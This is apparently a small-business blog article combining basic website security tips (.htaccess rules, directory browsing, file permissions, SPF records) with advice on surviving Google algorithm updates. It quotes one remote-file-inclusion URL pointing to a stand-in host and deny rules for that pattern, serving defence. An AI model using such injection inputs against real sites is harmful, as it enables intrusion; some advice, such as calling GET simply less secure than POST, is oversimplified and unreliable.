In a perfect world, you’d be able to mind your own business and cheerfully run a successful online business without being harassed by “cyberthugs”. However, until that perfect world comes, you'll need to slap a great big KEEP OUT sign on your website. This means creating security settings that will disallow access to sensitive data and controls. This article will show you how to take these simple steps and keep your website safe from hackers.

The Most Common Site Attacks

Unless you’re the FBI, the IRS or the CIA, or someone else with a sensitive high profile organization, you won’t be getting targeted by sophisticated hackers. However, there are plenty of amateur hackers who create automated scripts to penetrate people’s web security and deface their websites.

As you can imagine, fixing the damage done by these “script kiddies” can be time-consuming and all the while, you could be losing business and credibility. Let’s look at a few simple things you can do to keep these types of hackers from accessing your site.

Simple Site Security Measures

When you monitor the logs of your website, you’ll find that hack attempts typically come from the user-agent “libwww-perl. These user agents attempt to access pages (URLs) on your site for the sake of injecting code or uploading files into your site. Once these scripts (often called “botnet” scripts) are injected or uploaded, they can wreak havoc on your website and disable many of your interactive functions such as server-side programs.

These types of hacks can be prevented by simply blocking access from libwww-perl user-agents and URLs which include the command “=http:” “=http:” is a common code which is used by hackers attempting to access your site and connect it to another site which contains the malicious script or software. For example:

http://www.example.com/page.php?id1=http://www.strangersite.com/id.txt?

This can be prevented by adding a code to your .htaccess file which disallows libwww-perl user-agents from accessing your site:

RewriteCond %{HTTP_USER_AGENT} libwww [NC,OR]

RewriteCond %{QUERY_STRING} ^(.*)=http [NC]

RewriteRule ^(.*)$ – [F,L]

In addition to blocking access from potentially harmful agents, you’ll want to block the directory browsing on your website. When directory browsing is enabled, users can access directories/folders which contain your files, this means your web pages, your CSS files, and any files which are uploaded to your server. You can block directory browsing on your site using the following steps:

  • Click on the “index manager” option from your CNC panel.
  • Click on the directory/folder on which you wish to disable browsing.
  • Select the “no index” option and save your settings.

Once you’ve completed this, you can double-check the blocked settings by typing the directory URL into your browser. Repeat this set of steps for every directory which you wish to block directory browsing on, which (with very few exceptions) would be all of your directories.
 

Other Security Precautions to Consider

In addition to blocking directory browsing and libwww-perl access, have your web programmer change any scripts using the GET command and have them replace that command with the POST instead. Without getting into the VERY detailed explanation of the difference, the GET command is much less secure than POST and there’s really no difference in the options provided by either.

Also, before you change any of your file permissions to 777 (read/write/execute) be sure that you a specific reason for doing so. Most of the time, it’s better for you to leave these changes to your web programmer. If you purchase a piece of server-side software that requires you to change file permissions to 777, be sure that you thoroughly research it on all the major search engines before using it and proceed with caution.

If you require the assistance of a web programmer to complete any of the above tasks, you can hire one and they can complete these simple steps in no more than one hour. In fact, you can also hire them to create your robots.txt file, execute your file compression and create your meta tags, all of which they can complete as a reasonable small and inexpensive job.

These simple security measures will keep most cyberthugs out of your website. If you feel that your site might become the target of more experienced and determined hackers, your next course of action would be to hire a professional web security consultant. However, unless you’re a high-profile organization with supersensitive and valuable data on your site, these measures alone will most likely solve your security concerns.

Protecting Your Email Information

Protecting your email information and email addresses is also a very crucial security aspect. Hackers and spammers are always searching for website owner's and users' personal information that they could exploit. If they succeed, it not only damages your website credibility, but it also negatively affects your email deliverability rate and, therefore, revenue and ROI from your email marketing campaigns.

One of the most important things you can do to protect your email information from hackers is to add an SPF record.  An SPF record is a type of Domain Name Service (DNS) record that allows email systems to check if the sender of a message comes from a legitimate source and refuse an email if the source is not legitimate.


Watch the following video to learn how to add an SPF record.

Algorithm Changes Hurting Your Website

By choosing to use SEO as the main marketing technique, we give up a portion of our control to a third party. That third party is Google.

Cooperating with Google and adhering to their standards can bring high rewards, so the trade of control is usually worth it. Google receives a new website submission which will hopefully provide the answer to their user’s search queries and we internet marketers get targeted traffic from our submissions. Seems like a fair trade. However, it doesn’t always work out this well.

Within the past two years, Google has been releasing algorithm updates on a large scale. These updates specifically target different types of websites. The Mayday Update, for example, targeted “Google sniper” websites (sites with only a page or two of content built with the sole purpose of getting high rankings for as little effort as possible and selling products or collecting emails) which gamed Google's algorithm to fill up popular search results with spam websites. With the Mayday Update, many marketer’s full-time incomes were gone overnight.

Google followed this with the Panda Update. Although this update was more subtle, the results were staggering. Massive sites which were previously viewed as authority websites lost huge portions of their traffic.

The story doesn’t end there. With each of these updates, Google has cleared the web of spam content and filler niche websites. These spam websites aren’t the only victims, though. Much like the food chain, when you disrupt one group of websites, you dramatically affect the entire internet. When Google updates its algorithm, it can drastically affect ALL websites on the internet – even white hat websites.

In today’s article, we’ll go over a few essential tips to help your website weather any future algorithm updates.

Create a Fantastic User Experience

The first and most important factor to remember might seem quite obvious at first. Provide each visitor to your website with a great browsing experience.

Have you ever had this experience? You search Google looking for answers and the first site you visit is exactly what you’re looking for. This is the effect we need to duplicate with our own websites.

Although this factor is obvious, it’s too often neglected due to laziness or lack of time. It’s not easy to create a great user experience. You need to provide quality content and test it multiple times. Determine what the market wants out of your website and deliver that experience. If you can deliver the ideal experience to your visitors, your odds of avoiding damage in a future update is dramatically increased.

Outsourcing Content? Quality Check!

Content creation can be an extremely time-consuming process. Each new website created requires pages and pages of fresh content. If your goal is to run a large authority website, you’ll need hundreds of pages of content. For this reason, outsourcing content is extremely popular.

Outsourcing can be a double-edged sword. When you outsource content, you’re again putting control in the hands of someone else. If you have great writers working for you this isn’t a problem. If you have a lower budget, however, you may find that your written content suffers.

With the Panda Update, it has become clear that Google uses content as a massive factor when determining which websites are spam or fluff. It’s more important than ever to hire competent writers and create quality unique content.

Expert or Authority?

The Mayday Update showed us exactly what Google thinks of “filler websites.” If your website is not an expert or authority in your niche, your chances of being affected in a future up unwritten law of quality content increase exponentially.

Expert and authority status is gained through content and consistency. If you can provide excellent content within one area of your niche, you will gain authority in that specific area. At this point, it’s time to expand into other parts of your niche. This process demands fresh content for each area you expand into. If all this content is spot on and well written, Google will begin viewing your website as an authority within your niche.

Although the Panda Update hit several known “authority websites” these websites blatantly played against the unwritten law of quality content. As a result, they were penalized. It’s worth noting that even though these websites were obviously churning out subpar content, since they were authority websites, Google was extremely hesitant to pull the trigger (although they finally did).

If you run an authority website with quality content, you’re in an excellent spot for the long term.

Only Follow White-Hat SEO Practices

Last but not least, stick with white hat SEO. It can be tempting to spam links and manipulate Google’s algorithm, but this can be detrimental to your website’s success. SEO takes time, and the only way to speed up that process is to game the search engine.

As we’ve seen in the past, though, black and grey hat SEO can spell disaster to your website’s future. It’s always worth it to go 100% white hat. It might take more time, but you can be sure that your website’s future is much more stable than a website ranking due to shady and manipulative SEO techniques.

Stay Updated on what Google is Doing!

Although Google has the final word with your website, by creating excellent content and staying within white hat SEO, your website will have the best possible chance of succeeding regardless of Google updates.

If you’d like to keep updated on the latest Google algorithms, feel free to sign up for our weekly newsletter. Simply enter your name and e-mail to receive info on the latest SEO and internet marketing strategies for free!